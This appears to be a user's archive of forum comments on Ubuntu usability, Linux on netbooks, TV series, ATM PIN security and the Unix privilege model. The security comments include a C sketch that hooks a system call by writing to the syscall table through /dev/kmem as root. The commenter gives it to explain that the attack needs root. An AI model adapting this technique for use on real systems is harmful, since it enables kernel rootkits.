What do you think is difficult with Ubuntu? If you just want mail, word processing, spreadsheet and browsing, Ubuntu is no more difficult than Windows. You do not need the command line, the update manager just works (click on Update, and off it goes) and you do not need a degree in Computer Science to use it. Evolution, Open Office and Firefox provide the basics that home users need, and they are installed by default during a standard install.
Of course, if you want Outlook, Word, Excel and Internet Explorer, then I'm afraid that Linux is probably not for you, and you have been suckered in to the Microsoft way.
I've just put Jaunty on the IBM Thinkpad T20 (700MHz Pentium 3, 256MB memory, 20GB hard disk) that I am typing on (it was mine some time back and I am recycling it for one of my kids), and everything, and I mean everything, just worked from the install disk, including the Belkin wireless card, identified and installed during the normal graphical install process. This is a dual-boot system, and even knowing the Lenovo/IBM website, I have been unable to identify all of the correct screen and graphics drivers for Windows. And there are no applications installed. Sure seems to me like Ubuntu is easier. And for such an underpowered system (even by netbook standards), it is surprisingly usable. I can imagine that Jaunty (or an Easy Peasy derivative) is very suitable for netbooks.
I did not have to resort to the command line, or edit a configuration file once. I would have no hesitation in giving such a system to my father, who is 80. I'm sure that he would keep it up to date better than the Windows box he currently uses.
So stop spreading FUD. Ubuntu is a viable alternative already. The only thing that may stop it is a lack of technical support in the suppliers and maintainers, and this is only because there is not enough market penetration to make it viable for them to skill up. It's really a chicken-and-egg situation, which is being made more complex by the anti-competitive practices that Microsoft engage in.
I still think there are Firefly stories to tell. I want to know what the back story for Shepherd Book was, and I'm sure that there were plenty of war stories for Zoe and Malcolm.
Did the comics add anything to this?
B5 is finished. The story is finished (as JMS intended, although slightly out of sequence), and the spin-offs do not stand up against the original.
OK, I'm now worried. I think I always knew that some ATM's would use the magnetic stripe, but reading what you wrote makes me nervous.
Specifically, the same PIN is used for the Chip as would be required by a mag-stripe ATM.
OK, the PIN for the C&P is safe, as it is effectively used as one of the input keys to the challenge-response that the on-card chip uses, and thus is not stored on the card.
So how does the PIN for the mag-stripe work (and how has it always worked)? If this can be brute-forced in some way, does this not also compromise the C&P PIN?
Maybe I just have not understood how the mag-stripe authentication works, but it has to be checked by the ATM, and not every ATM in the world has my PIN stored in it. Is it one-way hashed in some way, or is it stored centrally and queried from the central repository each time the card is used? In the latter case, I sincerely hope that the telecoms traffic between the ATM and central repository is encrypted, and that every partner bank has the same high degree of security, to ensure that it cannot be fraudulently queried or possibly snooped.
Linux on netbooks
There are two reasons why Linux on netbooks is losing attention.
The first is that the versions of Linux shipped are, well, pants. I ditched Xandros, even after I broke out of the simple interface on my eeePC 701. If they shipped a mainstream distro, things might be different.
The second is that Microsoft stomped on the market by allowing XP, a dead OS as far as Microsoft was concerned a few months earlier, to be cut down and shipped at effectively no cost, merely to prevent Linux getting a decent foothold in a part of the PC market.
One wonders if they will be as willing to give away Windows 7 when this comes along. Or possibly they think they will have cornered the market by then.
From a customer perspective, if they can buy something familiar versus something different, both at the same price, I know what they will choose. Linux only had a chance in the mainstream while there was a price difference, and that was because Linux machines could be made with less memory and disk space, plus a free OS, compared with a Windows system. Stop making the smaller ones just for Linux, and you will only sell Windows systems.
OK, you're a Mac Fanboy, so I should expect some of what is in your post, but...
...I think that you ought to go back and check what Linux distro you were trying. I suspect that it might have been one of the bare-metal masochistic distros, or possibly one that was a little old. USB printers, for the most part, just work on most modern distros. Plug it in, and watch Linux tell you what the printer is, and which driver it will use.
And while it is the case that there are some codecs that may be difficult to find, they are probably equally difficult to find for OS 10.X, unless the vendor has explicitly provided them on the driver disk. And if this is the case, then probably the Windows codecs will work inside a wrapper on Linux. If the vendors did some due diligence, and provided instructions as they do for Windows and OS 10.X, then you would see that it is not Linux that was at fault, but the hardware vendors.
What is even more surprising is the fact that OS 10.X->Linux ports are not that difficult (OK, the screen API is different) but the rest is just *NIX like. So why no port?
I do take your point about applications, but this, again, is not Linux's fault. Just because an OS is free, some people have an expectation that all the apps should be free as well (I accept that they can be called freetards, but this is not all Linux users). And some software vendors are afraid that if they use GNU tools to compile an app, the app must be published under the GPL. Neither of these two statements is true. It is perfectly possible to port an app to Linux and sell it. If there were a Linux port of Adobe Creative Suite, QuarkXPress, or Final Cut Pro, maybe more people (such as you!) would see Linux as an alternative, and it would start fulfilling its promise.
Is this Linux's or the developers' fault? No. They have made this excellent platform, and commercial companies have not taken advantage of it.
If you had a choice of buying a shiny Mac running OS/X, or the same hardware running Linux, with the same choice of software and drivers, but the Linux box was £50 or £100 cheaper, which would you choose? Many people would choose the cheaper option. And there must be significant numbers of Windows users who would make the same choice to avoid Vista. Why then will the vendors not see this as an opportunity, and start selling their wares for Linux?
Oh, I forgot. Microsoft are pulling the strings. They can make it difficult to develop for Windows by withholding Windows information and cheap licences from developers who also produce Linux software, so few development houses can afford to sell Linux products. Why do MS not do that to OS/X developers? Because without some competition, the US DoJ would slice MS up.
@Marcel van Beurden
Totally agree. Exactly as I see it.
Let's hope someone influential recognises this before it gets too late! Or maybe it is already... (listens for crisp rustle of donations to party 'election' funds)
Bottom of the Phorm
Our exchange has just been LLU'd. I should now be able to get a better high-download-limit service than Virgin's ADSL service (everybody else running through BT Wholesale had hard limits that either could not be exceeded, or cost a fortune if you went over).
After being a Virgin ISP customer for 12 years, I think the time to switch has come at last.
There are a group of people, which probably includes most non-computerate end users, who need a new type of machine. It must come with the OS and other software in ROM, and have every app they need installed already.
This way they cannot install something which could do damage. But equally, they would not be able to install the latest Flash, Silverlight or any other flavour-of-the-month add-on.
Can't stomach such a thing? No, I didn't think so. Nor will most users, although UMPCs like the eeePC(s) nearly made it.
My coat is the one with the Amstrad Emailer box underneath it.
@AC on Funny how
OK, here is the difference.
On most Windows systems, people are running as a privileged user most of the time (they need to, so that their applications work). So if there is a hole in the browser that allows a remote-code exploit, it then has the required privilege to immediately add other back-doors, inject code into the core OS, and generally play havoc on the system in ways too many to mention.
On Linux, most users run as a restricted user by default. When they browse the internet, run applications etc, if there is a remote-code exploit, this code runs as a non-privileged user. So if it tries, for example, to write to /dev/mem, it fails. If it tries to change any system libraries, it fails. If it tries to change any binaries in system directories, it fails. In fact, pretty much everything damaging fails EXCEPT ON FILES OWNED by the user, which is their own data, and the configuration files for the apps they run.
Of course, it is possible to run most programs as root, but the normal state of affairs is that people don't. THIS IS THE DIFFERENCE.
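A trivial demonstration of the divide (a minimal sketch in C; the ordinary file permissions do all the work):

```c
#include <fcntl.h>
#include <stdio.h>

int main(void)
{
    /* /dev/mem is root-owned with no world write bit, so for an
     * ordinary user this open() fails with EACCES. */
    int fd = open("/dev/mem", O_WRONLY);
    if (fd < 0) {
        perror("open /dev/mem");  /* the expected outcome for a normal user */
        return 1;
    }
    /* Only reachable when running as root (or with the relevant capability). */
    printf("opened /dev/mem for writing: fd=%d\n", fd);
    return 0;
}
```

Run it as yourself and it is refused; run it under sudo and it succeeds. That, in two system calls, is the privilege divide described above.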
By default, there is no way for code to cross the non-privileged/privileged divide without the user taking affirmative action, and unlike Vista, it does not ask for permission every two minutes, so as soon as it does, most Linux users will be wary.
Before you start: yes, it is possible to change the user's PATH so that you run unintended programs, but normally, if you su or sudo, the path gets controlled again. Ditto LD_LIBRARY_PATH. Of course, you could try social engineering (go on, you really DO want to sudo this script I've dropped onto your system, even though you do not know what it does), but this is not a flaw in the OS. There really are people who know about security acting as gatekeepers-by-proxy for the dangerous things.
The UNIX model is not immune from exploits, but most of them are well known, and you can find out how to avoid them in any of the myriad Linux or UNIX books that are available. Most distros install pretty securely anyway, and they also contain information to avoid most of the pitfalls. And major distros patch new exploits resulting from code defects pretty quickly.
The plain truth is that *NIX security is too well understood to allow simple exploits any more. It's all in the pedigree.
Before people start, the term "userspace" used in the PDF does not mean from a non-privileged process. It needs to be run as root or another ID with write permission to /dev/mem.
What "userspace" means here is a process run as a normal process controlled by the scheduler, and not added from inside the kernel codebase (like a loadable kernel module would).
Basically, all this technique is doing is re-vectoring one of the system calls, something that people have been doing for as long as table-driven vector entry for system calls has existed. UNIX has done things this way since it first existed 40+ years ago (it was very convenient in the PDP/11 world, as it used the EMT instruction). The only real trick here is reserving memory in the kernel address space, and even this is not new (I could probably think of about half-a-dozen candidates for locating the code off the top of my head).
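For the curious, the mechanics are roughly as follows (a hypothetical sketch: the two addresses are invented for illustration, and it assumes root on an old kernel that still exposes a writable /dev/kmem, which modern kernels do not):

```c
#include <fcntl.h>
#include <stdio.h>
#include <unistd.h>

/* Invented addresses -- in practice these came from System.map or by
 * pattern-searching kernel memory. */
#define SYS_CALL_TABLE 0xc0349fa0UL   /* hypothetical address of sys_call_table */
#define TARGET_SLOT    37UL           /* hypothetical syscall slot to hijack */

int main(void)
{
    unsigned long hook = 0xc8832000UL; /* hypothetical address of the injected code */

    int fd = open("/dev/kmem", O_RDWR); /* needs root: that is the whole point */
    if (fd < 0) { perror("open /dev/kmem"); return 1; }

    /* Seek to the chosen slot in the syscall table and overwrite the
     * function pointer -- the "re-vectoring" described above. */
    if (lseek(fd, SYS_CALL_TABLE + TARGET_SLOT * sizeof(unsigned long), SEEK_SET) < 0) {
        perror("lseek"); return 1;
    }
    if (write(fd, &hook, sizeof hook) != (ssize_t)sizeof hook) {
        perror("write"); return 1;
    }
    close(fd);
    return 0;
}
```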
Due to a design flaw in the MT10 magtape driver code in Bell Labs UNIX Version 7 for the PDP/11 (circa 1978), we used to hang the tape device moderately frequently. I used to go in and zap the lock bit in the driver status table using db (the original UNIX debugger) so we could use it again without re-booting. And the Keele Kernel Overlay system used to re-vector all of the system calls, to allow segmentation register 6 to be altered to point to the area of memory that had the required code before actually jumping to it. This was all done in kernel space, of course, but it shows that the techniques are not new.
So. Stop frightening the ordinary users with things most of them will not understand, and just say that if you allow root access on your Linux box to any old code, expect your system to be 'pwned'.
Most major distros actually ship with SEL turned off.
There are not that many applications that would break if it were turned on, but the administration of the Linux system would need to be changed. As a UNIX luddite (and by this I mean someone who has been using it for so long that fundamental change appears abhorrent), I can understand this, and I feel really uneasy about turning SEL on on my own systems. I am keenly aware that the UNIX security model, which Linux (pre SEL) copies almost exactly, has always been weaker than it could have been (although much better than Windows up to Vista). The MULTICS model that VMS and PRIMOS implemented would have been better from the start, but UNIX was intended to be lightweight compared to MULTICS.
But, as the major variant of UNIX that I use in my professional life is implementing Role-Based-Access as well, I guess that I will just have to learn to live with it.
The MAC attacks are DoS attacks, and reading through the PDF on the Linux attack, firstly it is x86 specific, and secondly, to exploit it you need WRITE access to /dev/mem or /dev/kmem (it's slipped in at the end of section 3 that this is required, and the test there is being run from a # prompt, indicating root access).
*NIX security 101 states that these should be protected from write (and even read in many cases), for just this reason.
Of course, if your vector runs as root, then all bets are off, and there are innumerable ways of making a *NIX system do bad things, even if you have SE turned on.